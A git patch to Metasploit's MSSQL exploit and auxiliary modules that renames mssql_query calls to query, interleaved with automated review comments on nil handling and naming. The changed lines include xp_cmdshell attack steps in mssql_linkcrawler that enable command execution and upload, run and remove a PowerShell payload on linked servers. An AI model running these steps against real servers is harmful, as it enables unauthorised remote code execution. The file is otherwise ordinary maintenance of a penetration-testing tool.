From efb5077ca6d019543931a242608dc2aa62c888d7 Mon Sep 17 00:00:00 2001 From: sjanusz-r7 Date: Mon, 12 Feb 2024 10:27:11 +0000 Subject: [PATCH] Rename more mssql_query calls & fix AutoRunScript for MSSQL --- lib/rex/post/mssql/ui/console.rb | 2 +- modules/auxiliary/admin/mssql/mssql_enum.rb | 10 +++---- .../mssql/ms09_004_sp_replwritetovarbin.rb | 10 +++---- .../ms09_004_sp_replwritetovarbin_sqli.rb | 6 ++--- .../windows/mssql/mssql_linkcrawler.rb | 26 +++++++++---------- .../exploits/windows/mssql/mssql_payload.rb | 2 +- spec/lib/msf/base/sessions/mssql_spec.rb | 2 +- 7 files changed, 29 insertions(+), 29 deletions(-) diff --git a/lib/rex/post/mssql/ui/console.rb b/lib/rex/post/mssql/ui/console.rb index ef7482c463d11..c1db4e7022b57 100644 --- a/lib/rex/post/mssql/ui/console.rb +++ b/lib/rex/post/mssql/ui/console.rb @@ -28,7 +28,7 @@ def initialize(session, opts={}) # The mssql client context self.session = session self.client = session.client - self.cwd = session.client.mssql_query('SELECT DB_NAME();')[:rows][0][0] + self.cwd = session.client.query('SELECT DB_NAME();')[:rows][0][0] prompt = "%undMSSQL @ #{client.sock.peerinfo} (#{cwd})%clr" history_manager = Msf::Config.mssql_session_history super(prompt, '>', history_manager, nil, :mssql) diff --git a/modules/auxiliary/admin/mssql/mssql_enum.rb b/modules/auxiliary/admin/mssql/mssql_enum.rb index a605913dc6363..e2231c59d3ee2 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum.rb @@ -706,7 +706,7 @@ def run SELECT CAST(SYSOBJECTS.NAME AS CHAR) FROM SYSOBJECTS, SYSPROTECTS WHERE SYSPROTECTS.UID = 0 AND XTYPE IN ('X','P') AND SYSOBJECTS.ID = SYSPROTECTS.ID EOS - fountsp = mssql_query(query)[:rows] + fountsp = query(query)[:rows] if fountsp != nil fountsp.flatten! print_status("Stored Procedures with Public Execute Permission found:") 
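Review bot: `self.cwd = session.client.query('SELECT DB_NAME();')[:rows][0][0]` in `initialize` of console.rb dereferences the result with no check, so a reply whose `:rows` is nil or empty raises NoMethodError inside the console constructor and the session cannot be opened; the modules elsewhere in this patch (`if fountsp != nil`, `if instance_res != nil`) treat a nil `:rows` as an expected outcome. Assuming `client.query` returns the same hash shape the module-side `query` does (keys `:rows` and `:errors` are the ones read on this page), split and guard it: `rows = session.client.query('SELECT DB_NAME();')[:rows]` / `self.cwd = rows&.first&.first`. `initialize` continues beyond the hunk on both sides.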
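Review bot: In the mssql_enum hunk the renamed call `fountsp = query(query)[:rows]` now invokes a method named `query` with an argument that appears to be a local variable also named `query` (the heredoc assigned just above the hunk, which is cut at the hunk's first line). Ruby still resolves `query(query)` as a method call because of the parenthesised argument, so this works, but the local shadows the new method name for the rest of `run`, and any later bare `query` in that scope would yield the string instead of running a query. Renaming the local at its assignment and writing `fountsp = query(sql)[:rows]` removes the ambiguity. `run` continues beyond the hunk.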
@@ -734,7 +734,7 @@ def run
 instances =[]
 if vernum.join != "2000"
 querykey = "EXEC master..xp_regenumvalues \'HKEY_LOCAL_MACHINE\',\'SOFTWARE\\Microsoft\\Microsoft SQL Server\\Instance Names\\SQL\'"
- instance_res = mssql_query(querykey)[:rows]
+ instance_res = query(querykey)[:rows]
 if instance_res != nil
 instance_res.each do |i|
 instances << i[0]
@@ -742,7 +742,7 @@ def run
 end
 else
 querykey = "exec xp_regread \'HKEY_LOCAL_MACHINE\',\'SOFTWARE\\Microsoft\\Microsoft SQL Server\', \'InstalledInstances\'"
- instance_res = mssql_query(querykey)[:rows]
+ instance_res = query(querykey)[:rows]
 if instance_res != nil
 instance_res.each do |i|
 instances << i[1]
@@ -769,7 +769,7 @@ def run
 #---------------------------------------------------------
 # Enumerate under what accounts the instance services are running under
 print_status("Default Server Instance SQL Server Service is running under the privilege of:")
- privdflt = mssql_query("EXEC master..xp_regread \'HKEY_LOCAL_MACHINE\' ,\'SYSTEM\\CurrentControlSet\\Services\\MSSQLSERVER\',\'ObjectName\'")[:rows]
+ privdflt = query("EXEC master..xp_regread \'HKEY_LOCAL_MACHINE\' ,\'SYSTEM\\CurrentControlSet\\Services\\MSSQLSERVER\',\'ObjectName\'")[:rows]
 if privdflt != nil
 privdflt.each do |priv|
 print_status("\t#{priv[1]}")
@@ -787,7 +787,7 @@ def run
 if instancenames.length > 1
 instancenames.each do |i|
 if i.strip != "MSSQLSERVER"
- privinst = mssql_query("EXEC master..xp_regread \'HKEY_LOCAL_MACHINE\' ,\'SYSTEM\\CurrentControlSet\\Services\\MSSQL$#{i.strip}\',\'ObjectName\'")[:rows]
+ privinst = query("EXEC master..xp_regread \'HKEY_LOCAL_MACHINE\' ,\'SYSTEM\\CurrentControlSet\\Services\\MSSQL$#{i.strip}\',\'ObjectName\'")[:rows]
 if privinst != nil
 print_status("Instance #{i} SQL Server Service is running under the privilege of:")
 privinst.each do |p|
diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index 8338a28255092..82f4dcc6832c7 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -254,7 +254,7 @@ def check # since we need to have credentials for this vuln, we just login and run a query # to get the version information - if not (version = mssql_query_version()) + if not (version = query_version()) return Exploit::CheckCode::Safe end print_status("@@version returned:\n\t" + version) @@ -277,7 +277,7 @@ def exploit if target.name =~ /Automatic/ print_status("Attempting automatic target detection...") - version = mssql_query_version + version = query_version fail_with(Failure::NoAccess, "Unable to retrieve version information") if not version if (version =~ /8\.00\.194/) @@ -379,7 +379,7 @@ def exploit fail_with(Failure::NoAccess, "Unable to log in!") end begin - mssql_query(runme, datastore['VERBOSE']) + query(runme, datastore['VERBOSE']) rescue ::Errno::ECONNRESET, EOFError print_error("Error: #{$!}") end @@ -443,7 +443,7 @@ def mssql_encode_string(str) end - def mssql_query_version + def query_version begin logged_in = mssql_login_datastore rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Errno::EINTR @@ -453,7 +453,7 @@ def mssql_query_version if !logged_in fail_with(Failure::NoAccess, "Invalid SQL Server credentials") end - res = mssql_query("select @@version", datastore['VERBOSE']) + res = query("select @@version", datastore['VERBOSE']) disconnect return nil if not res diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb index d2d5843b5898c..ca44f5d5260f4 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb 
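Review bot: The hunks at `@@ -443` and `@@ -453` rename the module's own helper `mssql_query_version` to `query_version`, which the stated fix does not need; only the `mssql_query` call inside it had to change. Dropping the `mssql_` prefix gives a module-local helper a generic name that reads as if it came from the MSSQL mixin, and should the mixin ever provide a `query_version`, the module's definition would silently take precedence. I would keep `mssql_query_version` (or another clearly local name) here and in `ms09_004_sp_replwritetovarbin_sqli.rb`, where the same rename appears. The body of `query_version` continues beyond the hunk.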
@@ -256,7 +256,7 @@ def check # since we need to have credentials for this vuln, we just login and run a query # to get the version information - version = mssql_query_version + version = query_version unless version return Exploit::CheckCode::Safe end @@ -280,7 +280,7 @@ def exploit if target.name =~ /Automatic/ print_status("Attempting automatic target detection...") - version = mssql_query_version + version = query_version fail_with(Failure::NoAccess, "Unable to get version!") if not version if (version =~ /8\.00\.194/) @@ -444,7 +444,7 @@ def mssql_encode_string(str) end - def mssql_query_version + def query_version delay = 5 diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index 77d9fb6e8c968..9489327cf3b16 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -169,7 +169,7 @@ def exploit # Get configuration information from the linked server sql = query_builder(temppath,"",0,versionQuery) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore # Add newly aquired db servers to the masterlist, but don't add them if the link is broken or already exists if result[:errors].empty? and result[:rows] != nil then 
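Review bot: In the mssql_linkcrawler hunk at `@@ -169`, `result = query(sql, false) if mssql_login_datastore` followed by `if result[:errors].empty? and result[:rows] != nil` still has no path for a failed login: the modifier leaves `result` nil on first use, so the next line raises NoMethodError, and in `enable_xp_cmdshell` and `powershell_upload_exec` (the later hunks at `@@ -390`, `@@ -408`, `@@ -460`, `@@ -510`, `@@ -538`) the same modifier leaves `result` holding the previous query's rows, so `saoOrig`, `xpcmdOrig` and `xpcmdNow` can silently be read from the wrong result set. Since the rename touches every one of these lines, it is a good moment to make the login an explicit guard, e.g. `fail_with(Failure::NoAccess, 'Unable to log in') unless mssql_login_datastore` / `result = query(sql, false)`, and to stop reusing `result` across queries. `exploit` continues beyond the hunk.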
@@ -390,13 +390,13 @@ def enable_xp_cmdshell(path,name,shelled) # Check if "show advanced options" is enabled execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'show advanced options'" sql = query_builder(path,"",0,execute) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore saoOrig = result[:rows].pop.pop # Check if "xp_cmdshell" is enabled execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'xp_cmdshell'" sql = query_builder(path,"",0,execute) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore xpcmdOrig = result[:rows].pop.pop # Try blindly to enable "xp_cmdshell" on the linked server @@ -408,20 +408,20 @@ def enable_xp_cmdshell(path,name,shelled) # Enabling show advanced options and xp_cmdshell execute = "sp_configure 'show advanced options',1;reconfigure" sql = query_builder_rpc(path,"",0,execute) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore end # Enabling xp_cmdshell print_status("\t - xp_cmdshell is not enabled on " + name + "... Trying to enable") execute = "sp_configure 'xp_cmdshell',1;reconfigure" sql = query_builder_rpc(path,"",0,execute) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore end # Verifying that xp_cmdshell is now enabled (could be unsuccessful due to server policies, total removal etc.) execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'xp_cmdshell'" sql = query_builder(path,"",0,execute) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore xpcmdNow = result[:rows].pop.pop if xpcmdNow == 1 or xpcmdOrig == 1 
@@ -460,12 +460,12 @@ def enable_xp_cmdshell(path,name,shelled) print_status("\t - Disabling xp_cmdshell on " + name) execute = "sp_configure 'xp_cmdshell',0;reconfigure" sql = query_builder_rpc(path,"",0,execute) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore end if saoOrig == 0 and xpcmdNow == 1 execute = "sp_configure 'show advanced options',0;reconfigure" sql = query_builder_rpc(path,"",0,execute) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore end end @@ -510,19 +510,19 @@ def powershell_upload_exec(path) mytext_64.scan(/.{1,2500}/).each {|part| execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Write \"--#{linenum}--#{part}\" >> %TEMP%\\#{rand_filename}\"'" sql = query_builder(path,"",0,execute) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore linenum = linenum+1 } # Remove duplicate lines from temp file and write to new file execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{rand_filename}| get-unique > %TEMP%\\#{var_duplicates}\"'" sql = query_builder(path,"",0,execute) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore # Remove tracking tags from lines execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{var_duplicates} | Foreach-Object {$_ -replace \\\"--.*--\\\",\\\"\\\"} | Set-Content %TEMP%\\#{rand_filename}\"'" sql = query_builder(path,"",0,execute) - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore # Used base64 encoded powershell command so that we could use -noexit and avoid parsing errors # If running on 64bit system, 32bit powershell called from syswow64 
@@ -538,10 +538,10 @@ def powershell_upload_exec(path) # Execute the playload print_status("Executing payload...") - result = mssql_query(sql, false) if mssql_login_datastore + result = query(sql, false) if mssql_login_datastore # Remove payload data from the target server execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Remove-Item %TEMP%\\#{rand_filename}\";powershell -C \"Remove-Item %TEMP%\\#{var_duplicates}\"'" sql = query_builder(path,"",0,execute) - result = mssql_query(sql,false) + result = query(sql,false) end end diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb index cc3226876d6a0..df2d89c4df100 100644 --- a/modules/exploits/windows/mssql/mssql_payload.rb +++ b/modules/exploits/windows/mssql/mssql_payload.rb @@ -73,7 +73,7 @@ def check return Exploit::CheckCode::Detected end - mssql_query("select @@version", true) + query("select @@version", true) if mssql_is_sysadmin vprint_good "User #{datastore['USERNAME']} is a sysadmin" Exploit::CheckCode::Vulnerable diff --git a/spec/lib/msf/base/sessions/mssql_spec.rb b/spec/lib/msf/base/sessions/mssql_spec.rb index 3797813c35570..f4bb20c1df6ac 100644 --- a/spec/lib/msf/base/sessions/mssql_spec.rb +++ b/spec/lib/msf/base/sessions/mssql_spec.rb @@ -31,7 +31,7 @@ allow(user_input).to receive(:intrinsic_shell?).and_return(true) allow(user_input).to receive(:output=) allow(client).to receive(:sock).and_return(rstream) - allow(client).to receive(:mssql_query).and_return(query_result) + allow(client).to receive(:query).and_return(query_result) allow(rstream).to receive(:peerinfo).and_return(peer_info) end